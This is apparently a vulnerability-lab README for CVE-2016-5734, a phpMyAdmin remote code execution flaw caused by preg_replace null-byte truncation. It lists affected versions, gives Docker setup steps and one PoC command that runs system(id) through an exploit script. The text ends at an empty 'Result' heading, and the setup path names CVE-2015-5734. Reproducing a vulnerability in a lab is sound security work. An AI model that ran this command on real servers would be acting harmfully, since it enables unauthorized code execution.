CVE-2016-5734

PhpMyAdmin 4.0.x-4.6.2 Remote Code Execution Vulneravility

PhpMyAdmin is a free software tool written in PHP,internded to handle the administration of MySQL over the WEB.The vulnerablility is in the preg_replace function,because the information submitted by the use can be spliced into the first parameter.

Before PHP 5.4.7,the first parameter of preg_replace could be truncated with \0 and the change search pattern to \e.It can cause remote code execution vulnerability.

Affected versions:

• 4.0.x version before 4.0.10.16
• 4.4.x version before 4.4.15.7
• 4.6.x version before 4.6.3 (actually because this version requires PHP5.5+, this vulnerability cannot be reproduced)

Setup

cd vulhub/phpmyadmin/CVE-2015-5734
docker-compose up -d

After start,visit http://10.10.10.8:8080 and you will see the login page of phpMyAdmin.Log in withroot:root.

Exploit

This vulnerability requires login and the permission to write data.
POC

./cve-2016-5734.py -c 'system(id);' -u root -p root -d test http://10.10.10.8:8080/

Resuslt: